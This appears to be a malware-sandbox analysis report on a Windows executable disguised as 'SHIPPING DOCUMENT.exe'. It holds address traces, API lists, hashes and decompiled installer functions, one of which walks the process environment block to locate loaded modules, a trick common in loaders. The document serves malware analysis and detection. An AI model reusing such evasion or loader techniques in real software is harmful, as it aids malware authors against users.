                                            0x004049cc
                                            0x004049ce
                                            0x004049ce
                                            0x004049d3
                                            0x004049d5
                                            0x004049dd
                                            0x004049e4
                                            0x004049e6
                                            0x004049f1
                                            0x004049f1
                                            0x004049e6
                                            0x004049f8
                                            0x00404a01
                                            0x00404a0b
                                            0x00404a13
                                            0x00404a2e
                                            0x00404a15
                                            0x00404a1e
                                            0x00404a1e
                                            0x00404a13
                                            0x00404a33
                                            0x00404a38
                                            0x00404a3d
                                            0x00404a46
                                            0x00404a46
                                            0x00404a4f
                                            0x00404a51
                                            0x00404a51
                                            0x00404a5d
                                            0x00404a65
                                            0x00404a6f
                                            0x00404a6f
                                            0x00404a74
                                            0x00000000
                                            0x00404a74
                                            0x00404923
                                            0x004048da
                                            0x004048e1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004048e1
                                            0x00404800
                                            0x00404809
                                            0x00404823
                                            0x00404828
                                            0x00404832
                                            0x00404839
                                            0x00404845
                                            0x00404848
                                            0x0040484b
                                            0x00404852
                                            0x0040485a
                                            0x0040485d
                                            0x00404861
                                            0x00404868
                                            0x00404870
                                            0x004048ca
                                            0x00404872
                                            0x00404873
                                            0x0040487a
                                            0x00404884
                                            0x0040488c
                                            0x00404899
                                            0x004048ad
                                            0x004048b1
                                            0x004048b1
                                            0x004048ad
                                            0x004048b6
                                            0x004048c3
                                            0x004048c3
                                            0x00404870
                                            0x00000000
                                            0x00404828
                                            0x00404816
                                            0x00000000
                                            0x00000000
                                            0x0040481c
                                            0x00000000
                                            0x00404787
                                            0x00404794
                                            0x0040479d
                                            0x004047aa
                                            0x004047aa
                                            0x004047b1
                                            0x004047b7
                                            0x004047c0
                                            0x004047c3
                                            0x004047c6
                                            0x004047ce
                                            0x004047d1
                                            0x004047d4
                                            0x004047da
                                            0x004047e1
                                            0x004047e8
                                            0x00404a7a
                                            0x00404a8c
                                            0x004047ee
                                            0x004047f1
                                            0x00000000
                                            0x004047f1
                                            0x004047e8

                                            APIs
                                            • GetDlgItem.USER32 ref: 0040478D
                                            • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                            • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                            • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                            • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                                            • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                                            • SetDlgItemTextA.USER32 ref: 004048C3
                                              • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                              • Part of subcall function 00406503: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                              • Part of subcall function 00406503: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                              • Part of subcall function 00406503: CharNextA.USER32(?,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                              • Part of subcall function 00406503: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                            • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040499C
                                              • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                              • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                              • Part of subcall function 00404AF5: SetDlgItemTextA.USER32 ref: 00404BAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                                            • API String ID: 2624150263-1960534613
                                            • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                            • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                            • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                            • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                            0x00402174
                                            0x0040217e
                                            0x00402188
                                            0x00402195
                                            0x004021a0
                                            0x004021a3
                                            0x004021bd
                                            0x004021c3
                                            0x004021c9
                                            0x004021cc
                                            0x004021d6
                                            0x004021da
                                            0x004021da
                                            0x004021df
                                            0x004021f0
                                            0x004021f8
                                            0x004022d4
                                            0x004022d4
                                            0x004022db
                                            0x004021fe
                                            0x004021fe
                                            0x0040220d
                                            0x00402211
                                            0x00402214
                                            0x0040221a
                                            0x00402228
                                            0x0040222b
                                            0x0040222d
                                            0x00402238
                                            0x00402238
                                            0x0040223d
                                            0x0040223f
                                            0x00402246
                                            0x00402246
                                            0x00402249
                                            0x00402252
                                            0x00402255
                                            0x0040225a
                                            0x0040225c
                                            0x00402269
                                            0x00402269
                                            0x0040226c
                                            0x00402278
                                            0x0040227b
                                            0x00402284
                                            0x0040228a
                                            0x00402291
                                            0x004022aa
                                            0x004022ac
                                            0x004022ba
                                            0x004022ba
                                            0x004022aa
                                            0x004022bd
                                            0x004022c3
                                            0x004022c3
                                            0x004022c6
                                            0x004022cc
                                            0x004022d2
                                            0x004022e7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004022d2
                                            0x004022dd
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 123533781-47812868
                                            • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                            • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                            • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                            • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 39%
                                            			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                            0x004027b9
                                            0x004027cd
                                            0x004027d8
                                            0x004027d9
                                            0x00402918
                                            0x004027bb
                                            0x004027bb
                                            0x004027bd
                                            0x004027bf
                                            0x004027bf
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                            • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                            • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                            • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 022B182F, Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661312391.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                            • Instruction ID: 137fef46d9c46a00682995ec098ce9c39d5c57fd55c85d9bdd3ee27fc2e7e4a2
                                            • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                            • Instruction Fuzzy Hash: F7014C78E20208EFDB41DF98C580A9DBBF5FF08360B5084A5E808E7725E330AE50DB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10001000, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                            0x10001017

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661934764.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.661929652.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661940270.0000000010002000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 022B1617, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661312391.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x77c7ec
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                            0x00404ccf
                                            0x00404cd7
                                            0x00404cdf
                                            0x00404ce5
                                            0x00404cfd
                                            0x00404d00
                                            0x00404d01
                                            0x00404f2e
                                            0x00404f35
                                            0x00404f49
                                            0x00404f37
                                            0x00404f39
                                            0x00404f3c
                                            0x00404f3d
                                            0x00404f44
                                            0x00404f44
                                            0x00404f55
                                            0x00404f63
                                            0x00404f66
                                            0x00404f7c
                                            0x00404ff1
                                            0x00404ff4
                                            0x00404ff6
                                            0x00405000
                                            0x0040500e
                                            0x0040500e
                                            0x00405010
                                            0x0040501a
                                            0x00405020
                                            0x00405023
                                            0x00405026
                                            0x00405041
                                            0x00405028
                                            0x00405032
                                            0x00405032
                                            0x00405026
                                            0x0040501a
                                            0x00000000
                                            0x00404ff4
                                            0x00404f81
                                            0x00404f8c
                                            0x00404f91
                                            0x00404f98
                                            0x00404f9d
                                            0x00404fa1
                                            0x00404fac
                                            0x00404fac
                                            0x00404fb0
                                            0x00404fb4
                                            0x00404fb8
                                            0x00404fcb
                                            0x00404fba
                                            0x00404fba
                                            0x00404fc1
                                            0x00404fc7
                                            0x00404fc3
                                            0x00404fc3
                                            0x00404fc3
                                            0x00404fc1
                                            0x00404fcf
                                            0x00404fd1
                                            0x00404fe4
                                            0x00404fe7
                                            0x00404fea
                                            0x00404fea
                                            0x00404fb4
                                            0x00000000
                                            0x00404fa1
                                            0x00404f83
                                            0x00404f8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405044
                                            0x00405044
                                            0x0040504b
                                            0x004050bc
                                            0x004050c4
                                            0x004050cc
                                            0x004050cc
                                            0x004050d5
                                            0x004050d7
                                            0x004050de
                                            0x004050e1
                                            0x004050e1
                                            0x004050e7
                                            0x004050ee
                                            0x004050f1
